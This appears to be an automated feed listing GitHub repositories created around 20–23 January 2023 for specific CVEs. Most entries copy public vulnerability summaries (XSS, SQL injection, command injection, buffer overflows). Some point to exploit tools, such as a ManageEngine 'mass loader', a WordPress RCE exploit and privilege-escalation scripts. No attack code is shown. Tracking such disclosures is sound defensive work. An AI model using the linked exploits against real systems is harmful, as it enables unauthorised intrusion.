**A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, and <8.3.1** : [walnutsecurity/cve-2022-36804](https://github.com/walnutsecurity/cve-2022-36804) create time: 2023-01-23T12:51:09Z

**Run on your ManageEngine server** : [ACE-Responder/CVE-2022-47966_checker](https://github.com/ACE-Responder/CVE-2022-47966_checker) create time: 2023-01-23T11:33:29Z

**Signal Desktop before 6.2.0 on Windows, Linux, and macOS allows an attacker to obtain potentially sensitive attachments sent in messages from the attachments.noindex directory. Cached attachments are not effectively cleared. In some cases, even after a self-initiated file deletion, an attacker can still recover the fil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24069](https://github.com/Live-Hack-CVE/CVE-2023-24069) create time: 2023-01-23T11:52:47Z

**Signal Desktop before 6.2.0 on Windows, Linux, and macOS allows an attacker to modify conversation attachments within the attachments.noindex directory. Client mechanisms fail to validate modifications of existing cached files, resulting in an attacker's ability to insert malicious code into pre-existing attachments or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24068](https://github.com/Live-Hack-CVE/CVE-2023-24068) create time: 2023-01-23T11:52:43Z

**The manage engine mass loader for CVE-2022-47966** : [Inplex-sys/CVE-2022-47966](https://github.com/Inplex-sys/CVE-2022-47966) create time: 2023-01-23T10:45:23Z

**it is the official Fix of Wordpress CVE-2018-6389.** : [amit-pathak009/CVE-2018-6389-FIX](https://github.com/amit-pathak009/CVE-2018-6389-FIX) create time: 2023-01-23T09:44:16Z

**processCropSelections in tools/tiffcrop.c in LibTIFF through 4.5.0 has a heap-based buffer overflow (e.g., "WRITE of size 307203") via a crafted TIFF image. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48281](https://github.com/Live-Hack-CVE/CVE-2022-48281) create time: 2023-01-23T06:23:58Z

**An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46959](https://github.com/Live-Hack-CVE/CVE-2022-46959) create time: 2023-01-23T06:23:46Z

**app/View/AuthKeys/authkey_display.ctp in MISP through 2.4.167 has an XSS in authkey add via a Referer field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24070](https://github.com/Live-Hack-CVE/CVE-2023-24070) create time: 2023-01-23T06:23:54Z

**An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23314](https://github.com/Live-Hack-CVE/CVE-2023-23314) create time: 2023-01-23T06:23:50Z

**no description** : [vadim-a-yegorov/CVE-2022-26766-bootstrap](https://github.com/vadim-a-yegorov/CVE-2022-26766-bootstrap) create time: 2023-01-23T05:48:48Z

**Excessive Attack Surface in GitHub repository pyload/pyload prior to 0.5.0b3.dev41. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0435](https://github.com/Live-Hack-CVE/CVE-2023-0435) create time: 2023-01-22T23:42:40Z

**Python exploit for RCE in Wordpress** : [BLY-Coder/Python-exploit-CVE-2020-25213](https://github.com/BLY-Coder/Python-exploit-CVE-2020-25213) create time: 2023-01-22T16:54:25Z

**Booked Scheduler 2.5.5 allows authenticated users to create and schedule events for any other user via a modified userId value to reservation_save.php. NOTE: 2.5.5 is a version from 2014. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24058](https://github.com/Live-Hack-CVE/CVE-2023-24058) create time: 2023-01-22T11:39:04Z

**Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24059](https://github.com/Live-Hack-CVE/CVE-2023-24059) create time: 2023-01-22T11:39:00Z

**Improper Input Validation in GitHub repository pyload/pyload prior to 0.5.0b3.dev40. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0434](https://github.com/Live-Hack-CVE/CVE-2023-0434) create time: 2023-01-22T06:13:04Z

**A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24044](https://github.com/Live-Hack-CVE/CVE-2023-24044) create time: 2023-01-22T06:13:00Z

**A Segmentation fault was found in UPX in PackLinuxElf64::invert_pt_dynamic() in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23457](https://github.com/Live-Hack-CVE/CVE-2023-23457) create time: 2023-01-22T06:12:56Z

**A heap-based buffer overflow issue was discovered in UPX in PackTmt::pack() in p_tmt.cpp file. The flow allows an attacker to cause a denial of service (abort) via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23456](https://github.com/Live-Hack-CVE/CVE-2023-23456) create time: 2023-01-22T06:12:53Z

**In pkgconf through 1.9.3, variable duplication can cause unbounded string expansion due to incorrect checks in libpkgconf/tuple.c:pkgconf_tuple_parse. For example, a .pc file containing a few hundred bytes can expand to one billion bytes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24056](https://github.com/Live-Hack-CVE/CVE-2023-24056) create time: 2023-01-22T06:12:48Z

**** DISPUTED ** KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that l CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24055](https://github.com/Live-Hack-CVE/CVE-2023-24055) create time: 2023-01-22T06:12:45Z

**A remote attacker might be able to cause infinite recursion in PowerDNS Recursor 4.8.0 via a DNS query that retrieves DS records for a misconfigured domain, because QName minimization is used in QM fallback mode. This is fixed in 4.8.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22617](https://github.com/Live-Hack-CVE/CVE-2023-22617) create time: 2023-01-21T21:26:32Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1225. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0433](https://github.com/Live-Hack-CVE/CVE-2023-0433) create time: 2023-01-21T18:10:26Z

**Simple CVE-2021-20294 poc** : [tin-z/CVE-2021-20294-POC](https://github.com/tin-z/CVE-2021-20294-POC) create time: 2023-01-21T16:15:21Z

**Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22884](https://github.com/Live-Hack-CVE/CVE-2023-22884) create time: 2023-01-21T15:56:15Z

**A script to automate privilege escalation with CVE-2023-22809 vulnerability** : [n3m1dotsys/CVE-2023-22809-sudoedit-privesc](https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc) create time: 2023-01-21T15:19:23Z

**Demo webapp vulnerable to CVE-2022-44900** : [0xless/CVE-2022-44900-demo-lab](https://github.com/0xless/CVE-2022-44900-demo-lab) create time: 2023-01-21T14:52:59Z

**LPE exploit via windows driver** : [Marsel-marsel/CVE-2022-45770](https://github.com/Marsel-marsel/CVE-2022-45770) create time: 2023-01-21T10:32:02Z

**Yii Yii2 Gii before 2.2.2 allows remote attackers to execute arbitrary code via the Generator.php messageCategory field. The attacker can embed arbitrary PHP code into the model file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36655](https://github.com/Live-Hack-CVE/CVE-2020-36655) create time: 2023-01-21T07:10:01Z

**In Async before 2.6.4 and 3.x before 3.2.2, a malicious user can obtain privileges via the mapValues() method, aka lib/internal/iterator.js createObjectIterator prototype pollution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43138](https://github.com/Live-Hack-CVE/CVE-2021-43138) create time: 2023-01-21T07:09:48Z

**The HTML-StripScripts module through 1.06 for Perl allows _hss_attval_style ReDoS because of catastrophic backtracking for HTML content with certain style attributes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24038](https://github.com/Live-Hack-CVE/CVE-2023-24038) create time: 2023-01-21T07:10:05Z

**A race condition in LightFTP through 2.2 allows an attacker to achieve path traversal via a malformed FTP request. A handler thread can use an overwritten context->FileName. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24042](https://github.com/Live-Hack-CVE/CVE-2023-24042) create time: 2023-01-21T07:09:58Z

**** UNSUPPORTED WHEN ASSIGNED ** dtprintinfo in Common Desktop Environment 1.6 has a bug in the parser of lpstat (an invoked external command) during listing of the names of available printers. This allows low-privileged local users to inject arbitrary printer names via the $HOME/.printers file. This injection allows th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24040](https://github.com/Live-Hack-CVE/CVE-2023-24040) create time: 2023-01-21T07:09:55Z

**** UNSUPPORTED WHEN ASSIGNED ** A stack-based buffer overflow in ParseColors in libXm in Common Desktop Environment 1.6 can be exploited by local low-privileged users via the dtprintinfo setuid binary to escalate their privileges to root on Solaris 10 systems. NOTE: This vulnerability only affects products that are no CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24039](https://github.com/Live-Hack-CVE/CVE-2023-24039) create time: 2023-01-21T07:09:51Z

**libgit2 is a cross-platform, linkable library implementation of Git. When using an SSH remote with the optional libssh2 backend, libgit2 does not perform certificate checking by default. Prior versions of libgit2 require the caller to set the `certificate_check` field of libgit2's `git_remote_callbacks` structure - if CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22742](https://github.com/Live-Hack-CVE/CVE-2023-22742) create time: 2023-01-21T01:37:12Z

**Roundcube Webmail before 1.3.15 and 1.4.8 allows stored XSS in HTML messages during message display via a crafted SVG document. This issue has been fixed in 1.4.8 and 1.3.15. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16145](https://github.com/Live-Hack-CVE/CVE-2020-16145) create time: 2023-01-20T23:23:42Z

**LibEtPan through 1.9.4, as used in MailCore 2 through 0.6.3 and other products, has a STARTTLS buffering issue that affects IMAP, SMTP, and POP3. When a server sends a "begin TLS" response, the client reads additional data (e.g., from a meddler-in-the-middle attacker) and evaluates it in a TLS context, aka "response in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15953](https://github.com/Live-Hack-CVE/CVE-2020-15953) create time: 2023-01-20T23:23:38Z

**Cybereason EDR version 19.1.282 and above, 19.2.182 and above, 20.1.343 and above, and 20.2.X and above has a DLL hijacking vulnerability, which could allow a local attacker to execute code with elevated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25502](https://github.com/Live-Hack-CVE/CVE-2020-25502) create time: 2023-01-20T23:23:19Z

**When a file is processed, an infinite loop occurs in next_inline() of the more_curly() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33642](https://github.com/Live-Hack-CVE/CVE-2021-33642) create time: 2023-01-20T23:23:27Z

**When processing files, malloc stores the data of the current line. When processing comments, malloc incorrectly accesses the released memory (use after free). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33641](https://github.com/Live-Hack-CVE/CVE-2021-33641) create time: 2023-01-20T23:23:23Z

**Even if the authentication fails for local service authentication, the requested command could still execute regardless of authentication status. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46732](https://github.com/Live-Hack-CVE/CVE-2022-46732) create time: 2023-01-20T23:23:09Z

**no description** : [TurtleARM/CVE-2023-0179-PoC](https://github.com/TurtleARM/CVE-2023-0179-PoC) create time: 2023-01-21T01:02:01Z

**CRYSTALS-DILITHIUM (in Post-Quantum Cryptography Selected Algorithms 2022) in PQClean d03da30 may allow universal forgeries of digital signatures via a template side-channel attack because of intermediate data leakage of one vector. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24025](https://github.com/Live-Hack-CVE/CVE-2023-24025) create time: 2023-01-20T23:23:34Z

**erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23607](https://github.com/Live-Hack-CVE/CVE-2023-23607) create time: 2023-01-20T23:23:30Z

**In MISP 2.4.167, app/Controller/Component/ACLComponent.php has incorrect access control for the decaying import function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24028](https://github.com/Live-Hack-CVE/CVE-2023-24028) create time: 2023-01-20T23:23:05Z

**In MISP 2.4.167, app/webroot/js/action_table.js allows XSS via a network history name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24027](https://github.com/Live-Hack-CVE/CVE-2023-24027) create time: 2023-01-20T23:23:01Z

**In MISP 2.4.167, app/webroot/js/event-graph.js has an XSS vulnerability via an event-graph preview payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24026](https://github.com/Live-Hack-CVE/CVE-2023-24026) create time: 2023-01-20T23:22:57Z

**act is a project which allows for local running of github actions. The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. The /upload CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22726](https://github.com/Live-Hack-CVE/CVE-2023-22726) create time: 2023-01-20T23:22:53Z

**SAUTER Controls Nova 200–220 Series with firmware version 3.3-006 and prior and BACnetstac version 4.2.1 and prior allows the execution of commands without credentials. As Telnet and file transfer protocol (FTP) are the only protocols available for device management, an unauthorized user could access the system and mod CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0052](https://github.com/Live-Hack-CVE/CVE-2023-0052) create time: 2023-01-20T23:22:49Z

**IBM Cognos Analytics 11.0 and 11.1 allows overly permissive cross-origin resource sharing which could allow an attacker to transfer private information. An attacker could exploit this vulnerability to access content that should be restricted. IBM X-Force ID: 161422. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4343](https://github.com/Live-Hack-CVE/CVE-2019-4343) create time: 2023-01-20T22:18:22Z

**An issue was discovered in Roundcube Webmail before 1.2.11, 1.3.x before 1.3.14, and 1.4.x before 1.4.7. It allows XSS via a crafted HTML e-mail message, as demonstrated by a JavaScript payload in the xmlns (aka XML namespace) attribute of a HEAD element when an SVG element exists. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15562](https://github.com/Live-Hack-CVE/CVE-2020-15562) create time: 2023-01-20T22:18:33Z

**Use after free in extensions in Google Chrome prior to 83.0.4103.116 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6509](https://github.com/Live-Hack-CVE/CVE-2020-6509) create time: 2023-01-20T22:18:29Z

**PHPMailer before 6.1.6 contains an output escaping bug when the name of a file attachment contains a double quote character. This can result in the file type being misinterpreted by the receiver or any mail relay processing the message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13625](https://github.com/Live-Hack-CVE/CVE-2020-13625) create time: 2023-01-20T22:18:25Z

**osquery before version 4.4.0 enables a privilege escalation vulnerability. If a Window system is configured with a PATH that contains a user-writable directory then a local user may write a zlib1.dll DLL, which osquery will attempt to load. Since osquery runs with elevated privileges this enables local escalation. This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11081](https://github.com/Live-Hack-CVE/CVE-2020-11081) create time: 2023-01-20T22:18:18Z

**LuaJit through 2.1.0-beta3 has an out-of-bounds read because __gc handler frame traversal is mishandled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15890](https://github.com/Live-Hack-CVE/CVE-2020-15890) create time: 2023-01-20T22:18:14Z

**A vulnerability, which was classified as problematic, was found in earclink ESPCMS P8.21120101. Affected is an unknown function of the component Content Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VD CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0246](https://github.com/Live-Hack-CVE/CVE-2023-0246) create time: 2023-01-20T22:18:11Z

**A vulnerability, which was classified as critical, has been found in SourceCodester Online Flight Booking Management System. This issue affects some unknown processing of the file add_contestant.php. The manipulation of the argument add_contestant leads to sql injection. The attack may be initiated remotely. The exploi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0245](https://github.com/Live-Hack-CVE/CVE-2023-0245) create time: 2023-01-20T22:18:07Z

**A vulnerability classified as critical was found in TuziCMS 2.0.6. This vulnerability affects the function delall of the file \App\Manage\Controller\KefuController.class.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0244](https://github.com/Live-Hack-CVE/CVE-2023-0244) create time: 2023-01-20T22:17:59Z

**TVT NVMS-1000 devices allow GET /.. Directory Traversal CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20085](https://github.com/Live-Hack-CVE/CVE-2019-20085) create time: 2023-01-20T22:18:41Z

**The PoDoFo::PdfVariant::DelayedLoad function in PdfVariant.h in PoDoFo 0.9.6 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file, because of ImageExtractor.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20093](https://github.com/Live-Hack-CVE/CVE-2019-20093) create time: 2023-01-20T22:18:37Z

**In the Linux kernel before 5.1, there is a memory leak in __feat_register_sp() in net/dccp/feat.c, which may cause denial of service, aka CID-1d3ff0950e2b. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20096](https://github.com/Live-Hack-CVE/CVE-2019-20096) create time: 2023-01-20T22:18:03Z

**An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20141](https://github.com/Live-Hack-CVE/CVE-2019-20141) create time: 2023-01-20T22:17:54Z

**The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17621](https://github.com/Live-Hack-CVE/CVE-2019-17621) create time: 2023-01-20T22:17:50Z

**In Pure-FTPd 1.0.49, a stack exhaustion issue was discovered in the listdir function in ls.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20176](https://github.com/Live-Hack-CVE/CVE-2019-20176) create time: 2023-01-20T22:17:47Z

**There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15920](https://github.com/Live-Hack-CVE/CVE-2020-15920) create time: 2023-01-20T22:17:43Z

**Parallels Remote Application Server (RAS) 17.1.1 has a Business Logic Error causing remote code execution. It allows an authenticated user to execute any application in the backend operating system through the web application, despite the affected application not being published. In addition, it was discovered that it CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15860](https://github.com/Live-Hack-CVE/CVE-2020-15860) create time: 2023-01-20T22:17:39Z

**The Postie plugin 1.9.40 for WordPress allows XSS, as demonstrated by a certain payload with jaVasCript:/* at the beginning and a crafted SVG element. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20204](https://github.com/Live-Hack-CVE/CVE-2019-20204) create time: 2023-01-20T22:17:36Z

**Combodo iTop does not validate inputted parameters, attackers can inject malicious commands and launch XSS attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12778](https://github.com/Live-Hack-CVE/CVE-2020-12778) create time: 2023-01-20T22:17:32Z

**A function in Combodo iTop contains a vulnerability of Broken Access Control, which allows unauthorized attacker to inject command and disclose system information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12777](https://github.com/Live-Hack-CVE/CVE-2020-12777) create time: 2023-01-20T22:17:28Z

**Combodo iTop contains a cross-site request forgery (CSRF) vulnerability, attackers can execute specific commands via malicious site request forgery. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12781](https://github.com/Live-Hack-CVE/CVE-2020-12781) create time: 2023-01-20T22:17:24Z

**dimC_Read in isomedia/box_code_3gpp.c in GPAC 0.8.0 has a stack-based buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20208](https://github.com/Live-Hack-CVE/CVE-2019-20208) create time: 2023-01-20T22:17:19Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16327](https://github.com/Live-Hack-CVE/CVE-2017-16327) create time: 2023-01-20T20:03:25Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16326](https://github.com/Live-Hack-CVE/CVE-2017-16326) create time: 2023-01-20T20:03:21Z

**An issue was discovered in the Linux kernel before 5.0.6. In rx_queue_add_kobject() and netdev_queue_add_kobject() in net/core/net-sysfs.c, a reference count is mishandled, aka CID-a3e23f719f5c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20811](https://github.com/Live-Hack-CVE/CVE-2019-20811) create time: 2023-01-20T20:03:42Z

**In the Linux kernel before 5.3.4, a reference count usage error in the fib6_rule_suppress() function in the fib6 suppression feature of net/ipv6/fib6_rules.c, when handling the FIB_LOOKUP_NOREF flag, can be exploited by a local attacker to corrupt memory, aka CID-ca7a03c41753. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18198](https://github.com/Live-Hack-CVE/CVE-2019-18198) create time: 2023-01-20T20:03:33Z

**A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1100, CVE-2020-1101. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1106](https://github.com/Live-Hack-CVE/CVE-2020-1106) create time: 2023-01-20T20:04:33Z

**yaws_config.erl in Yaws through 2.0.2 and/or 2.0.7 loads obsolete TLS ciphers, as demonstrated by ones that allow Sweet32 attacks, if running on an Erlang/OTP virtual machine with a version less than 21.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12872](https://github.com/Live-Hack-CVE/CVE-2020-12872) create time: 2023-01-20T20:04:05Z

**websocket-extensions ruby module prior to 0.1.5 allows Denial of Service (DoS) via Regex Backtracking. The extension parser may take quadratic time when parsing a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. This could be ab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7663](https://github.com/Live-Hack-CVE/CVE-2020-7663) create time: 2023-01-20T20:04:00Z

**Certain TP-Link devices allow Command Injection. This affects NC200 2.1.9 build 200225, NC210 1.0.9 build 200304, NC220 1.3.0 build 200304, NC230 1.3.0 build 200304, NC250 1.3.0 build 200304, NC260 1.5.2 build 200304, and NC450 1.5.3 build 200304. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12109](https://github.com/Live-Hack-CVE/CVE-2020-12109) create time: 2023-01-20T20:03:56Z

**An issue was discovered in Ceph through 13.2.9. A POST request with an invalid tagging XML can crash the RGW process by triggering a NULL pointer exception. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12059](https://github.com/Live-Hack-CVE/CVE-2020-12059) create time: 2023-01-20T20:03:51Z

**Attacker is able craft an article with a link to the customer address book with malicious content (JavaScript). When agent opens the link, JavaScript code is executed due to the missing parameter encoding. This issue affects: ((OTRS)) Community Edition: 6.0.26 and prior versions. OTRS: 7.0.15 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1771](https://github.com/Live-Hack-CVE/CVE-2020-1771) create time: 2023-01-20T20:03:38Z

**A TOCTOU (time-of-check to time-of-use) vulnerability exists where an attacker may use a compromised BIOS to cause the TEE OS to read memory out of bounds that could potentially result in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46795](https://github.com/Live-Hack-CVE/CVE-2021-46795) create time: 2023-01-20T20:03:46Z

**Insufficient input validation during parsing of the System Management Mode (SMM) binary may allow a maliciously crafted SMM executable binary to corrupt Dynamic Root of Trust for Measurement (DRTM) user application memory that may result in a potential denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46791](https://github.com/Live-Hack-CVE/CVE-2021-46791) create time: 2023-01-20T20:03:29Z

**regex is an implementation of regular expressions for the Rust language. The regex crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guara CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24713](https://github.com/Live-Hack-CVE/CVE-2022-24713) create time: 2023-01-20T20:04:38Z

**In DPA 2022.4 and older releases, generated heap memory dumps contain sensitive information in cleartext. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38112](https://github.com/Live-Hack-CVE/CVE-2022-38112) create time: 2023-01-20T20:04:13Z

**In Database Performance Analyzer (DPA) 2022.4 and older releases, certain URL vectors are susceptible to authenticated reflected cross-site scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38110](https://github.com/Live-Hack-CVE/CVE-2022-38110) create time: 2023-01-20T20:04:09Z

**The Easy Digital Downloads WordPress Plugin, version < 3.1.0.4, is affected by an unauthenticated SQL injection vulnerability in the 's' parameter of its 'edd_download_search' action. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23489](https://github.com/Live-Hack-CVE/CVE-2023-23489) create time: 2023-01-20T20:04:29Z

**The Paid Memberships Pro WordPress Plugin, version < 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23488](https://github.com/Live-Hack-CVE/CVE-2023-23488) create time: 2023-01-20T20:04:25Z

**An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. CheckUser TokenManager insecurely uses AES-CTR encryption with a repeated (aka re-used) nonce, allowing an adversary to decrypt. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22912](https://github.com/Live-Hack-CVE/CVE-2023-22912) create time: 2023-01-20T20:04:21Z

**An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. There is XSS in Wikibase date formatting via wikibase-time-precision-* fields. This allows JavaScript execution by staff/admin users who do not intentionally have the editsitejs capability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22910](https://github.com/Live-Hack-CVE/CVE-2023-22910) create time: 2023-01-20T20:04:17Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16331](https://github.com/Live-Hack-CVE/CVE-2017-16331) create time: 2023-01-20T17:55:37Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16330](https://github.com/Live-Hack-CVE/CVE-2017-16330) create time: 2023-01-20T17:55:33Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16329](https://github.com/Live-Hack-CVE/CVE-2017-16329) create time: 2023-01-20T17:55:30Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16328](https://github.com/Live-Hack-CVE/CVE-2017-16328) create time: 2023-01-20T17:55:26Z

**An issue was discovered in Open Ticket Request System (OTRS) 7.x through 7.0.6 and Community Edition 5.0.x through 5.0.35 and 6.0.x through 6.0.17. An attacker who is logged into OTRS as an agent user with appropriate permissions may manipulate the URL to cause execution of JavaScript in the context of OTRS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10067](https://github.com/Live-Hack-CVE/CVE-2019-10067) create time: 2023-01-20T17:55:45Z

